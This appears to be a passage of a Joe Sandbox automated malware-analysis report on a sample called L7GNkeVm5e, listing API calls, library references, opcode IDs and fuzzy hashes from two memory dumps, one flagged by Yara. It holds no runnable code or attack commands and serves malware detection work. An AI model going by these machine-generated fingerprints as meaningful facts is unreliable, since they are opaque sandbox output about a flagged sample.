                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E51
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132051
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213205D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132068
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132073
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213207E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132089
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132094
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213209F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021320AA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021320B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction ID: e79338f48ae0d403a90321f77fbeeab98d5c9867fbd36c9146409db446fed4a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6113FB6950108AFCF02EF94C941D993FABEF04350B5185A5BA188B271DB31EA649FC4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                                  • String ID: <(@$<(@
                                                                                                                                                                                                                                                  • API String ID: 4189289331-1745028333
                                                                                                                                                                                                                                                  • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                  • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                  • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                                                  • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction ID: 8c77a33a39e060f4423344fcfec09ad99134287e64d1d88f3512c668b29cef46
• Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction Fuzzy Hash: EEC1E471D84349AFDB17DFA8D844BAEBBB2AF09310F0441D5E424A7392C7359941CBA9
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
• PMDtoOffset.LIBCMT ref: 00428D3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID: Bad dynamic_cast!
• API String ID: 1467055271-2956939130
• Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
• Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
• Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
• Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9
APIs
• atomic_compare_exchange.LIBCONCRT ref: 0211C6CC
• atomic_compare_exchange.LIBCONCRT ref: 0211C6F0
• std::_Cnd_initX.LIBCPMT ref: 0211C701
• std::_Cnd_initX.LIBCPMT ref: 0211C70F
  • Part of subcall function 02101370: __Mtx_unlock.LIBCPMT ref: 02101377
• std::_Cnd_initX.LIBCPMT ref: 0211C71F
  • Part of subcall function 0211C3DF: __Cnd_broadcast.LIBCPMT ref: 0211C3E6
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0211C72D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
• String ID: d#D
• API String ID: 4258476935-2139572230
• Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
• Instruction ID: 7ca5177944fb0cce67e66b8a4f56463aec03222bf0f8c457b22845332606d9e6
• Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
• Instruction Fuzzy Hash: 7C01A276981605AFDB24BB708D85BAEB35BBF04360F540021E905976C0EBF8EB158ED2
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
• __alloca_probe_16.LIBCMT ref: 004321B6
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
• __alloca_probe_16.LIBCMT ref: 0043229B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
• __freea.LIBCMT ref: 0043230B
  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
• __freea.LIBCMT ref: 00432314
• __freea.LIBCMT ref: 00432339
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
• Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
• Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
• Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
• Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
APIs
  • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
  • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
  • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
• _free.LIBCMT ref: 02131434
• _free.LIBCMT ref: 0213144D
• _free.LIBCMT ref: 0213147F
• _free.LIBCMT ref: 02131488
• _free.LIBCMT ref: 02131494
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast
• String ID: C
• API String ID: 3291180501-1037565863
• Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
• Instruction ID: 7e15563922c0fd0cae2467e154a28f63ca6e27fd45ca6677f205df6b8d0bb9f0
• Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
• Instruction Fuzzy Hash: 5EB11775A41219AFDB25DF28C884BADB7B6FB08314F1085EAD94DA7350D730AE90CF80
APIs
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
• Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
• Instruction ID: b84d786a2d304f8d485e6043c67ce007233797ba679a131996904a6fdb599de2
• Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
• Instruction Fuzzy Hash: 4B61F471D40205AFDB22DF68C841B9ABBF7FF05720F2441AAE894EB351D7719941CB94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00433930
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0043394B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                                                  • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,0212C494,E0830C40,?,?,?,?,?,?,0213424F,0210E032,0212C494,?,0212C494,0212C494,0210E032), ref: 02133B1C
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 02133B97
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 02133BB2
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0212C494,00000001,?,00000005,00000000,00000000), ref: 02133BD8
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,0213424F,00000000,?,?,?,?,?,?,?,?,?,0213424F,0210E032), ref: 02133BF7
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0210E032,00000001,0213424F,00000000,?,?,?,?,?,?,?,?,?,0213424F,0210E032), ref: 02133C30
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                                                  • Instruction ID: 72b877baf42c9e8a91fd7ab500000f0ca2e026c250e636c587f2bae0f4b1ee87
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F51D674D40209AFDB11CFA8D885BEEBBF5EF09700F14416AE965E7391D730A981CBA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02124ABD
                                                                                                                                                                                                                                                    • Part of subcall function 02124D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021247F0), ref: 02124D9C
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02124AD2
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02124AE1
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02124AEF
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02124B65
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02124BA5
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02124BB3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3151764488-0
                                                                                                                                                                                                                                                  • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                                  • Instruction ID: cd2a87ea47cb6514a711c09ec5952f676b90f0cb4fcf9e83abfece644a27dcba
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE310835A402249FCF14EF68C884B6D73BAFF44710F244565F816AB285DB70EA29CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                  • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction ID: 886605b2d476a4344b8d3c51c71cf270481fe26b3c850c9c23addf976bb98927
• Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction Fuzzy Hash: A911E97298412DBFDB262F769C08D6B7A6FFF82B31B110664FC15D7250DB319911CAA0

APIs
  • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
• _free.LIBCMT ref: 0043A3C1
  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
• _free.LIBCMT ref: 0043A3CC
• _free.LIBCMT ref: 0043A3D7
• _free.LIBCMT ref: 0043A42B
• _free.LIBCMT ref: 0043A436
• _free.LIBCMT ref: 0043A441
• _free.LIBCMT ref: 0043A44C
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
• Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47

APIs
  • Part of subcall function 0213A321: _free.LIBCMT ref: 0213A34A
• _free.LIBCMT ref: 0213A628
  • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
  • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
• _free.LIBCMT ref: 0213A633
• _free.LIBCMT ref: 0213A63E
• _free.LIBCMT ref: 0213A692
• _free.LIBCMT ref: 0213A69D
• _free.LIBCMT ref: 0213A6A8
• _free.LIBCMT ref: 0213A6B3
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction ID: 95a5d0576e5239dce8b1f14ac93f15e97e2178c557356555c4524f3841933a6d
• Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction Fuzzy Hash: 0111CEB1981B04BEDE22BBB1CD45FCB779FEF05700F804825A2E9A6160DB65F6148E94

APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
• Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
• Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
• Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
• Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D

APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 02112657
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 0211265D
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 0211268A
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 02112694
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 021126A6
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021126BC
• __CxxThrowException@8.LIBVCRUNTIME ref: 021126CA
